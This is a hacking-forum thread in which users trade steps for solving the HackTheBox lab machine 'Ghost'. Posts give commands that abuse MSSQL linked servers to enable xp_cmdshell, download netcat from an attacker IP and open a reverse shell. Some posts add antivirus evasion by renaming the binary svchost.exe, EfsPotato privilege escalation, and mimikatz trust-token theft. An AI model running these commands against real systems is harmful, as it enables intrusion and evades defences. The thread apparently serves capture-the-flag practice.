Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#61
From mssql this is unintended way. Anybody know intended?
Reply
#62
(Jul 14, 2024, 05:03 PM)JAGS_BLAST Wrote:
(Jul 14, 2024, 05:02 PM)a44857437 Wrote: I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably?

how did u get a shell?

I used mssqlclient, use_link [PRIMARY] and exec_sa_login (it is described in the thread somewhere) then enabled xp_cmdshell and ran a reverse shell

(Jul 14, 2024, 05:12 PM)jsvensson Wrote: From mssql this is unintended way. Anybody know intended?

No, but I guess it involves ADFS in some way...
Reply
#63
(Jul 14, 2024, 05:16 PM)bl4ckp4nth3r3 Wrote: stuck with mssqlclient - all cmd entered only return in error and kill the impacket client... anyone else have same issues?

there you go
enum_links

use_link [PRIMARY]

use master

exec_as_login sa

enable_xp_cmdshell

xp_cmdshell "whoami"
Reply
#64
xp_cmdshell "echo IWR http://10.10.xx.xx:8000/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile"

xp_cmdshell "%TEMP%\nc.exe 10.10.xx.xx6666 -e powershell.exe"

although I used my own nc, idk how the one with kali works....
Reply
#65
guys after mssql what to do

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#66
(Jul 14, 2024, 06:15 PM)shadow_monarch Wrote: where is the root and user flag


C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 161D-1BB7

Directory of C:\Users\Administrator\Desktop

07/10/2024 04:19 AM <DIR> .
07/03/2024 08:55 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,519,295,488 bytes free

You're not done
Reply
#67
How the hell bypass av to get meterpreter or other wat to get nt-authority?
Reply
#68
guys use efs potato to get system

https://github.com/zcgonvh/EfsPotato --> move EfsPotato.cs to the target machine

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

./EfsPotato.exe 'whoami'

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#69
(Jul 14, 2024, 07:02 PM)jimmyshoemacher Wrote:
(Jul 14, 2024, 06:38 PM)jsvensson Wrote: How the hell bypass av to get meterpreter or other wat to get nt-authority?

after alot of trying this worked for me

EXEC xp_cmdshell 'mkdir %TEMP%\mydir';

xp_cmdshell "echo IWR http://10.10.xx.xx/nc64.exe -Outfile %TEMP%\mydir\svchost.exe | powershell -noprofile"
xp_cmdshell "%TEMP%\mydir\svchost.exe 10.10.x.xx 4444 -e powershell.exe"

nc.exe certainly works too. download the nc.exe to c:\users\public\documents. for some reason windows defender doesn't flag nc.exe
Reply
#70
(Jul 14, 2024, 05:28 PM)JAGS_BLAST Wrote:
(Jul 14, 2024, 05:14 PM)a44857437 Wrote:
(Jul 14, 2024, 05:03 PM)JAGS_BLAST Wrote:
(Jul 14, 2024, 05:02 PM)a44857437 Wrote: I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably?

how did u get a shell?

I used mssqlclient, use_link [PRIMARY] and exec_sa_login (it is described in the thread somewhere) then enabled xp_cmdshell and ran a reverse shell

(Jul 14, 2024, 05:12 PM)jsvensson Wrote: From mssql this is unintended way. Anybody know intended?

No, but I guess it involves ADFS in some way...

what did u run to get the reverse shell tho cuz everything i have tried ether gets blocked or just doesn't workl

I cobbled together a powershell rev shell where I masked a number of calls and modules with '*' so they are not really visible to AV anymore

(Jul 14, 2024, 06:15 PM)shadow_monarch Wrote: where is the root and user flag


C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 161D-1BB7

Directory of C:\Users\Administrator\Desktop

07/10/2024 04:19 AM <DIR> .
07/03/2024 08:55 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,519,295,488 bytes free

If you got here through the rev shell via mssql server, you're on the PRIMARY machine (part of corp.ghost.htb), the flags are on dc01, you have to abuse the trust and steal the trust token with mimikatz
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,590 35 minutes ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,944 9 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,799 10 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,616 Today, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,269 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)